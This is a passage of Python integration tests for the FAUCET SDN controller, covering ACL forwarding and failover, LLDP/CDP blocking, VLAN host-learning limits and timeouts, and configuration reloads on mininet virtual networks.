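# ports 3 and 4 drop everything, so no L2 learning is required.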
class FaucetNailedForwardingTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
class FaucetNailedForwardingOrderedTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
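# As above, but output uses failover groups: traffic to port 2 fails over to port 3 when port 2 goes down.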
class FaucetNailedFailoverForwardingTest(FaucetNailedForwardingTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingOrderedTest(FaucetNailedForwardingTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetUntaggedLLDPBlockedTest(FaucetUntaggedTest):
def test_untagged(self):
self.ping_all_when_learned()
self.verify_lldp_blocked()
# Verify flood blocking of the reserved bridge multicast range (covers LLDP/802.1X) was triggered.
self.wait_nonzero_packet_count_flow(
{'dl_dst': '01:80:c2:00:00:00/ff:ff:ff:ff:ff:f0'},
table_id=self._FLOOD_TABLE)
class FaucetUntaggedCDPTest(FaucetUntaggedTest):
def test_untagged(self):
self.ping_all_when_learned()
self.verify_cdp_blocked()
class FaucetTaggedAndUntaggedSameVlanTest(FaucetTest):
"""Test mixture of tagged and untagged hosts on the same VLAN."""
N_TAGGED = 1
N_UNTAGGED = 3
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "mixed"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetTaggedAndUntaggedSameVlanTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=1, n_untagged=3, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
"""Test connectivity including after port flapping."""
self.ping_all_when_learned()
self.flap_all_switch_ports()
self.ping_all_when_learned()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedAndUntaggedSameVlanEgressTest(FaucetTaggedAndUntaggedSameVlanTest):
REQUIRES_METADATA = True
CONFIG = """
egress_pipeline: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetTaggedAndUntaggedSameVlanGroupTest(FaucetTaggedAndUntaggedSameVlanTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedMaxHostsTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: 2
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.pingAll()
learned_hosts = [
host for host in self.hosts_name_ordered() if self.host_learned(host)]
self.assertEqual(2, len(learned_hosts))
self.assertEqual(2, self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
self.assertGreater(
self.scrape_prometheus_var(
'vlan_learn_bans', {'vlan': '100'}), 0)
class FaucetMaxHostsPortTest(FaucetUntaggedTest):
MAX_HOSTS = 3
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
max_hosts: 3
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.ping_all_when_learned()
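# Offer twice as many macvlan source MACs as the port allows; only MAX_HOSTS of them should be learned on port 2.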
for i in range(10, 10+(self.MAX_HOSTS*2)):
mac_intf = 'mac%u' % i
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
ping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, mac_intf, first_host.IP()),
2)
second_host.cmd(ping_cmd)
flows = self.get_matching_flows_on_dpid(
self.dpid,
{'dl_vlan': '100', 'in_port': int(self.port_map['port_2'])},
table_id=self._ETH_SRC_TABLE)
self.assertEqual(self.MAX_HOSTS, len(flows))
port_labels = self.port_labels(self.port_map['port_2'])
self.assertGreater(
self.scrape_prometheus_var(
'port_learn_bans', port_labels), 0)
learned_macs = [
mac for _, mac in self.scrape_prometheus_var(
'learned_macs', dict(port_labels, vlan=100),
multiple=True) if mac]
self.assertEqual(self.MAX_HOSTS, len(learned_macs))
class FaucetSingleHostsTimeoutPrometheusTest(FaucetUntaggedTest):
"""Test that hosts learned and reported in Prometheus, time out."""
TIMEOUT = 15
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 25
arp_neighbor_timeout: 12
nd_neighbor_timeout: 12
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
""" + CONFIG_BOILER_UNTAGGED
def hosts_learned(self, hosts):
"""Check that hosts are learned by FAUCET on the expected ports."""
macs_learned = []
for mac, port in hosts.items():
if self.prom_mac_learned(mac, port=port):
self.mac_learned(mac, in_port=port)
macs_learned.append(mac)
return macs_learned
def verify_hosts_learned(self, first_host, second_host, mac_ips, hosts):
mac_ipv4s = [mac_ipv4 for mac_ipv4, _ in mac_ips]
fping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c%u %s' % (
self.FPING_ARGS_SHORT, int(self.TIMEOUT / 3), ' '.join(mac_ipv4s)),
self.TIMEOUT / 2)
for _ in range(3):
fping_out = first_host.cmd(fping_cmd)
self.assertTrue(fping_out, msg='fping did not complete: %s' % fping_cmd)
macs_learned = self.hosts_learned(hosts)
if len(macs_learned) == len(hosts):
return
time.sleep(1)
first_host_diag = first_host.cmd('ifconfig -a ; arp -an')
second_host_diag = second_host.cmd('ifconfig -a ; arp -an')
self.fail('%s cannot be learned (%s != %s)\nfirst host %s\nsecond host %s\n' % (
mac_ips, macs_learned, fping_out, first_host_diag, second_host_diag))
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
all_learned_mac_ports = {}
# learn batches of hosts, then down them
for base in (10, 20, 30):
def add_macvlans(base, count):
mac_intfs = []
mac_ips = []
learned_mac_ports = {}
for i in range(base, base + count):
mac_intf = 'mac%u' % i
mac_intfs.append(mac_intf)
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
macvlan_mac = self.get_mac_of_intf(mac_intf, second_host)
learned_mac_ports[macvlan_mac] = self.port_map['port_2']
mac_ips.append((mac_ipv4, macvlan_mac))
return (mac_intfs, mac_ips, learned_mac_ports)
def down_macvlans(macvlans):
for macvlan in macvlans:
second_host.cmd('ip link set dev %s down' % macvlan)
def learn_then_down_hosts(base, count):
mac_intfs, mac_ips, learned_mac_ports = add_macvlans(base, count)
self.verify_hosts_learned(first_host, second_host, mac_ips, learned_mac_ports)
down_macvlans(mac_intfs)
return learned_mac_ports
learned_mac_ports = learn_then_down_hosts(base, 5)
all_learned_mac_ports.update(learned_mac_ports)
# make sure at least one host still learned
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.assertTrue(learned_macs)
before_expiry_learned_macs = learned_macs
# make sure they all eventually expire
for _ in range(self.TIMEOUT * 3):
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.verify_learn_counters(
100, list(range(1, len(self.hosts_name_ordered()) + 1)))
if not learned_macs:
break
time.sleep(1)
self.assertFalse(learned_macs, msg='MACs did not expire: %s' % learned_macs)
self.assertTrue(before_expiry_learned_macs)
for mac in before_expiry_learned_macs:
self.wait_until_no_matching_flow({'eth_dst': mac}, table_id=self._ETH_DST_TABLE)
class FaucetSingleHostsNoIdleTimeoutPrometheusTest(FaucetSingleHostsTimeoutPrometheusTest):
"""Test broken reset idle timer on flow refresh workaround."""
CONFIG = """
timeout: 15
arp_neighbor_timeout: 4
nd_neighbor_timeout: 4
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
idle_dst: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetSingleL3LearnMACsOnPortTest(FaucetUntaggedTest):
# TODO: currently set to accommodate the least capable hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 512
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.254.254'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
faucet_vips: ["10.0.254.254/16"]
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
ipv4_fib: %u
""" % (_max_hosts() + 64, _max_hosts() + 64, _max_hosts() + 64) +
"""
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetSingleL2LearnMACsOnPortTest(FaucetUntaggedTest):
# TODO: currently set to accommodate the least capable hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 1024
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.0.1'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
""" % (_max_hosts() + 64, _max_hosts() + 64) +
"""
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetUntaggedHUPTest(FaucetUntaggedTest):
"""Test handling HUP signal without config change."""
def _configure_count_with_retry(self, expected_count):
for _ in range(3):
configure_count = self.get_configure_count()
if configure_count == expected_count:
return
time.sleep(1)
self.fail('configure count %u != expected %u' % (
configure_count, expected_count))
def test_untagged(self):
"""Test that FAUCET receives HUP signal and keeps switching."""
init_config_count = self.get_configure_count()
reload_type_vars = (
'faucet_config_reload_cold',
'faucet_config_reload_warm')
reload_vals = {}
for var in reload_type_vars:
reload_vals[var] = self.scrape_prometheus_var(
var, dpid=True, default=None)
for i in range(init_config_count, init_config_count+3):
self._configure_count_with_retry(i)
with open(self.faucet_config_path, 'a') as config_file:
config_file.write('\n')
self.verify_faucet_reconf(change_expected=False)
self._configure_count_with_retry(i+1)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_disconnections_total', dpid=True, default=None),
0)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_connections_total', dpid=True, default=None),
1)
self.wait_until_controller_flow()
self.ping_all_when_learned()
for var in reload_type_vars:
self.assertEqual(
reload_vals[var],
self.scrape_prometheus_var(var, dpid=True, default=None))
class FaucetIPv4TupleTest(FaucetTest):
MAX_RULES = 1024
ETH_TYPE = IPV4_ETH
NET_BASE = ipaddress.IPv4Network('10.0.0.0/16')
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
table_sizes:
port_acl: 1100
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
"""
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
- rule:
actions: {allow: 1}
eth_type: 2048
ip_proto: 6
ipv4_dst: 127.0.0.1
ipv4_src: 127.0.0.1
tcp_dst: 65535
tcp_src: 65535
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetIPv4TupleTest, self).setUp()
self.acl_config_file = os.path.join(self.tmpdir, 'acl.txt')
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
with open(self.acl_config_file, 'w') as acl_config_file:
acl_config_file.write(self.START_ACL_CONFIG)
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def _push_tuples(self, eth_type, host_ips):
max_rules = len(host_ips)
rules = 1
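# Double the number of exact-match tuples each iteration, up to MAX_RULES.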
while rules <= max_rules:
rules_yaml = []
for rule in range(rules):
host_ip = host_ips[rule]
port = (rule + 1) % 2**16
ip_match = str(host_ip)
rule_yaml = {
'eth_type': eth_type,
'ip_proto': 6,
'tcp_src': port,
'tcp_dst': port,
'ipv%u_src' % host_ip.version: ip_match,
'ipv%u_dst' % host_ip.version: ip_match,
'actions': {'allow': 1},
}
rules_yaml.append({'rule': rule_yaml})
yaml_acl_conf = {'acls': {1: {'exact_match': True, 'rules': rules_yaml}}}
tuple_txt = '%u IPv%u tuples\n' % (len(rules_yaml), host_ip.version)
error('pushing %s' % tuple_txt)
self.reload_conf(
yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
restart=True, cold_start=False)
error('pushed %s' % tuple_txt)
self.wait_until_matching_flow(
{'tp_src': port, 'ip_proto': 6, 'dl_type': eth_type}, table_id=0)
rules *= 2
def test_tuples(self):
host_ips = [host_ip for host_ip in itertools.islice(
self.NET_BASE.hosts(), self.MAX_RULES)]
self._push_tuples(self.ETH_TYPE, host_ips)
class FaucetIPv6TupleTest(FaucetIPv4TupleTest):
MAX_RULES = 1024
ETH_TYPE = IPV6_ETH
NET_BASE = ipaddress.IPv6Network('fc00::00/64')
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
- rule:
actions: {allow: 1}
eth_type: 34525
ip_proto: 6
ipv6_dst: ::1
ipv6_src: ::1
tcp_dst: 65535
tcp_src: 65535
"""
class FaucetConfigReloadTestBase(FaucetTest):
"""Test handling HUP signal with config change."""
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
tagged_vlans: [200]
"""
ACL = """
acls:
1:
- rule:
description: "rule 1"
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
2:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 1
3:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5003
actions:
allow: 0
4:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
deny:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 0
allow:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
"""
ACL_COOKIE = None
def setUp(self): # pylint: disable=invalid-name
super(FaucetConfigReloadTestBase, self).setUp()
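# Use a random cookie so tests can verify that ACL flows carry the configured cookie value.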
self.ACL_COOKIE = random.randint(1, 2**16-1)
self.ACL = self.ACL.replace('COOKIE', str(self.ACL_COOKIE))
self.acl_config_file = '%s/acl.yaml' % self.tmpdir
with open(self.acl_config_file, 'w') as config_file:
config_file.write(self.ACL)
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
class FaucetDelPortTest(FaucetConfigReloadTestBase):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 200
"""
def test_port_down_flow_gone(self):
last_host = self.hosts_name_ordered()[-1]
self.require_host_learned(last_host)
second_host_dst_match = {'eth_dst': last_host.MAC()}
self.wait_until_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
self.change_port_config(
self.port_map['port_4'], None, None,
restart=True, cold_start=True)
self.wait_until_no_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
class FaucetConfigReloadTest(FaucetConfigReloadTestBase):
def test_add_unknown_dp(self):
conf = self._get_faucet_conf()
conf['dps']['unknown'] = {
'dp_id': int(self.rand_dpid()),
'hardware': 'Open vSwitch',
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_tabs_are_bad(self):
self._enable_event_log()
self.ping_all_when_learned()
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
good_config_hash_info = event['CONFIG_CHANGE']['config_hash_info']
self.assertNotEqual('', good_config_hash_info['hashes'])
orig_conf = self._get_faucet_conf()
self.force_faucet_reload(
'\t'.join(('tabs', 'are', 'bad')))
self.assertEqual(1, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: not event['CONFIG_CHANGE']['success'])
self.assertEqual('', event['CONFIG_CHANGE']['config_hash_info']['hashes'])
self.ping_all_when_learned()
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
self.assertEqual(good_config_hash_info, event['CONFIG_CHANGE']['config_hash_info'])
def test_port_change_vlan(self):
first_host, second_host = self.hosts_name_ordered()[:2]
third_host, fourth_host = self.hosts_name_ordered()[2:]
self.ping_all_when_learned()
self.change_port_config(
self.port_map['port_1'], 'native_vlan', 200,
restart=False, cold_start=False)
self.wait_until_matching_flow(
{'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.change_port_config(
self.port_map['port_2'], 'native_vlan', 200,
restart=True, cold_start=False)
for port_name in ('port_1', 'port_2'):
self.wait_until_matching_flow(
{'in_port': int(self.port_map[port_name])},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:4296}'])
self.one_ipv4_ping(first_host, second_host.IP(), require_host_learned=False)
# hosts 1 and 2 now in VLAN 200, so they shouldn't see floods for 3 and 4.
self.verify_vlan_flood_limited(
third_host, fourth_host, first_host)
def test_port_change_acl(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
orig_conf = self._get_faucet_conf()
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE, cookie=self.ACL_COOKIE)
self.wait_until_matching_flow(
{'vlan_vid': 100}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, host_cache=100)
self.verify_tp_dst_notblocked(
5001, first_host, second_host, table_id=None)
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=None)
def test_port_change_perm_learn(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
self.change_port_config(
self.port_map['port_1'], 'permanent_learn', True,
restart=True, cold_start=False)
self.ping_all_when_learned(hard_timeout=0)
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.retry_net_ping(hosts=(first_host, second_host))
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
restart=True, cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE)
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetDeleteConfigReloadTest(FaucetConfigReloadTestBase):
def test_delete_interface(self):
# With all ports changed, we should cold start.
conf = self._get_faucet_conf()
del conf['dps'][self.DP_NAME]['interfaces']
conf['dps'][self.DP_NAME]['interfaces'] = {
int(self.port_map['port_1']): {
'native_vlan': '100',
'tagged_vlans': ['200'],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetRouterConfigReloadTest(FaucetConfigReloadTestBase):
def test_router_config_reload(self):
conf = self._get_faucet_conf()
conf['routers'] = {
'router-1': {
'vlans': ['100', '200'],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetConfigReloadAclTest(FaucetConfigReloadTestBase):
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acls_in: [allow]
%(port_2)d:
native_vlan: 100
acl_in: allow
%(port_3)d:
native_vlan: 100
acl_in: deny
%(port_4)d:
native_vlan: 100
acl_in: deny
"""
def _verify_hosts_learned(self, hosts):
self.pingAll()
for host in hosts:
self.require_host_learned(host)
self.assertEqual(len(hosts), self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
def test_port_acls(self):
hup = not self.STAT_RELOAD
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self._verify_hosts_learned((first_host, second_host))
self.change_port_config(
self.port_map['port_3'], 'acl_in', 'allow',
restart=True, cold_start=False, hup=hup)
self.change_port_config(
self.port_map['port_1'], 'acls_in', [3, 4, 'allow'],
restart=True, cold_start=False, hup=hup)
self.coldstart_conf(hup=hup)
self._verify_hosts_learned((first_host, second_host, third_host))
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.verify_tp_dst_blocked(5003, first_host, second_host)
class FaucetConfigStatReloadAclTest(FaucetConfigReloadAclTest):
# Use the stat-based reload method.
STAT_RELOAD = '1'
class FaucetUntaggedBGPDualstackDefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24", "fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
